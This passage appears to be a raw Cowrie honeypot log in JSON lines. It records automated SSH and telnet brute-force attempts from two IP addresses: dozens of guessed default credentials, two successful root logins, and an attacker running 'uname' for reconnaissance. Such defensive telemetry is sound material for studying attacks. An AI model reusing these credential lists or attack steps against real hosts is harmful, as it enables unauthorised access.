sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:22:25.723034Z","src_ip":"212.227.235.229","session":"75ae55860498"}
{"eventid":"cowrie.login.failed","username":"flask","password":"12345678","message":"login attempt [flask/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T05:22:26.300238Z","src_ip":"212.227.235.229","session":"75ae55860498"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:22:27.446252Z","src_ip":"212.227.235.229","session":"75ae55860498"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39800,"dst_ip":"1.2.3.4","dst_port":22,"session":"27911fdf91ef","protocol":"ssh","message":"New connection: 212.227.125.160:39800 (1.2.3.4:22) [session: 27911fdf91ef]","sensor":"my-vps","timestamp":"2025-08-28T05:22:33.254095Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:22:33.319671Z","src_ip":"212.227.125.160","session":"27911fdf91ef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:22:33.427626Z","src_ip":"212.227.125.160","session":"27911fdf91ef"}
{"eventid":"cowrie.login.failed","username":"user1","password":"user1","message":"login attempt [user1/user1] failed","sensor":"my-vps","timestamp":"2025-08-28T05:22:33.836120Z","src_ip":"212.227.125.160","session":"27911fdf91ef"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:22:34.943845Z","src_ip":"212.227.125.160","session":"27911fdf91ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51660,"dst_ip":"1.2.3.4","dst_port":22,"session":"dcdf7251e96e","protocol":"ssh","message":"New connection: 212.227.235.229:51660 (1.2.3.4:22) [session: dcdf7251e96e]","sensor":"my-vps","timestamp":"2025-08-28T05:22:40.362086Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:22:40.362778Z","src_ip":"212.227.235.229","session":"dcdf7251e96e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:22:40.507641Z","src_ip":"212.227.235.229","session":"dcdf7251e96e"}
{"eventid":"cowrie.login.failed","username":"user1","password":"user1","message":"login attempt [user1/user1] failed","sensor":"my-vps","timestamp":"2025-08-28T05:22:40.944722Z","src_ip":"212.227.235.229","session":"dcdf7251e96e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:22:42.092370Z","src_ip":"212.227.235.229","session":"dcdf7251e96e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60240,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c1767d8aa73","protocol":"ssh","message":"New connection: 212.227.125.160:60240 (1.2.3.4:22) [session: 0c1767d8aa73]","sensor":"my-vps","timestamp":"2025-08-28T05:22:48.685607Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:22:48.686479Z","src_ip":"212.227.125.160","session":"0c1767d8aa73"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:22:48.790378Z","src_ip":"212.227.125.160","session":"0c1767d8aa73"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop","message":"login attempt [hadoop/hadoop] failed","sensor":"my-vps","timestamp":"2025-08-28T05:22:49.225129Z","src_ip":"212.227.125.160","session":"0c1767d8aa73"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:22:50.330725Z","src_ip":"212.227.125.160","session":"0c1767d8aa73"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47888,"dst_ip":"1.2.3.4","dst_port":22,"session":"519db6f8324c","protocol":"ssh","message":"New connection: 212.227.235.229:47888 (1.2.3.4:22) [session: 519db6f8324c]","sensor":"my-vps","timestamp":"2025-08-28T05:23:01.999364Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:23:02.000577Z","src_ip":"212.227.235.229","session":"519db6f8324c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:23:02.143415Z","src_ip":"212.227.235.229","session":"519db6f8324c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48242,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7c2f3838df2","protocol":"ssh","message":"New connection: 212.227.125.160:48242 (1.2.3.4:22) [session: a7c2f3838df2]","sensor":"my-vps","timestamp":"2025-08-28T05:23:02.226776Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:23:02.271843Z","src_ip":"212.227.125.160","session":"a7c2f3838df2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:23:02.374574Z","src_ip":"212.227.125.160","session":"a7c2f3838df2"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop","message":"login attempt [hadoop/hadoop] failed","sensor":"my-vps","timestamp":"2025-08-28T05:23:02.621137Z","src_ip":"212.227.235.229","session":"519db6f8324c"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"!QAZ@WSX","message":"login attempt [oracle/!QAZ@WSX] failed","sensor":"my-vps","timestamp":"2025-08-28T05:23:02.758593Z","src_ip":"212.227.125.160","session":"a7c2f3838df2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43812,"dst_ip":"1.2.3.4","dst_port":23,"session":"44e498cfbb18","protocol":"telnet","message":"New connection: 212.227.125.160:43812 (1.2.3.4:23) [session: 44e498cfbb18]","sensor":"my-vps","timestamp":"2025-08-28T05:23:03.432141Z"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:23:03.802122Z","src_ip":"212.227.235.229","session":"519db6f8324c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:23:03.863558Z","src_ip":"212.227.125.160","session":"a7c2f3838df2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53042,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa98abd03386","protocol":"ssh","message":"New connection: 212.227.235.229:53042 (1.2.3.4:22) [session: aa98abd03386]","sensor":"my-vps","timestamp":"2025-08-28T05:23:09.394293Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:23:09.395233Z","src_ip":"212.227.235.229","session":"aa98abd03386"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:23:09.537613Z","src_ip":"212.227.235.229","session":"aa98abd03386"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"!QAZ@WSX","message":"login attempt [oracle/!QAZ@WSX] failed","sensor":"my-vps","timestamp":"2025-08-28T05:23:09.966862Z","src_ip":"212.227.235.229","session":"aa98abd03386"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:23:11.111183Z","src_ip":"212.227.235.229","session":"aa98abd03386"}
{"eventid":"cowrie.session.closed","duration":12.125084161758423,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:23:15.557139Z","src_ip":"212.227.125.160","session":"44e498cfbb18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34350,"dst_ip":"1.2.3.4","dst_port":22,"session":"08c595450e1b","protocol":"ssh","message":"New connection: 212.227.125.160:34350 (1.2.3.4:22) [session: 08c595450e1b]","sensor":"my-vps","timestamp":"2025-08-28T05:23:16.830395Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:23:16.899087Z","src_ip":"212.227.125.160","session":"08c595450e1b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:23:16.978854Z","src_ip":"212.227.125.160","session":"08c595450e1b"}
{"eventid":"cowrie.login.failed","username":"test","password":"1234qwer","message":"login attempt [test/1234qwer] failed","sensor":"my-vps","timestamp":"2025-08-28T05:23:17.425150Z","src_ip":"212.227.125.160","session":"08c595450e1b"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:23:18.554168Z","src_ip":"212.227.125.160","session":"08c595450e1b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36146,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffbbd7b070d6","protocol":"ssh","message":"New connection: 212.227.125.160:36146 (1.2.3.4:22) [session: ffbbd7b070d6]","sensor":"my-vps","timestamp":"2025-08-28T05:23:32.319385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:23:32.385973Z","src_ip":"212.227.125.160","session":"ffbbd7b070d6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:23:32.434604Z","src_ip":"212.227.125.160","session":"ffbbd7b070d6"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456","message":"login attempt [root/Aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:23:32.886039Z","src_ip":"212.227.125.160","session":"ffbbd7b070d6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:23:33.260859Z","src_ip":"212.227.125.160","session":"ffbbd7b070d6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:23:33.261530Z","src_ip":"212.227.125.160","session":"ffbbd7b070d6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:23:33.367728Z","src_ip":"212.227.125.160","session":"ffbbd7b070d6"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:23:33.368876Z","src_ip":"212.227.125.160","session":"ffbbd7b070d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42652,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb7b9b5c1132","protocol":"ssh","message":"New connection: 212.227.235.229:42652 (1.2.3.4:22) [session: eb7b9b5c1132]","sensor":"my-vps","timestamp":"2025-08-28T05:23:38.406339Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:23:38.407310Z","src_ip":"212.227.235.229","session":"eb7b9b5c1132"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:23:38.551374Z","src_ip":"212.227.235.229","session":"eb7b9b5c1132"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456","message":"login attempt [root/Aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:23:38.985681Z","src_ip":"212.227.235.229","session":"eb7b9b5c1132"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:23:39.379045Z","src_ip":"212.227.235.229","session":"eb7b9b5c1132"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:23:39.379713Z","src_ip":"212.227.235.229","session":"eb7b9b5c1132"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45528,"dst_ip":"1.2.3.4","dst_port":22,"session":"f18e04a148b5","protocol":"ssh","message":"New connection: 212.227.235.229:45528 (1.2.3.4:22) [session: f18e04a148b5]","sensor":"my-vps","timestamp":"2025-08-28T05:23:39.381054Z"}
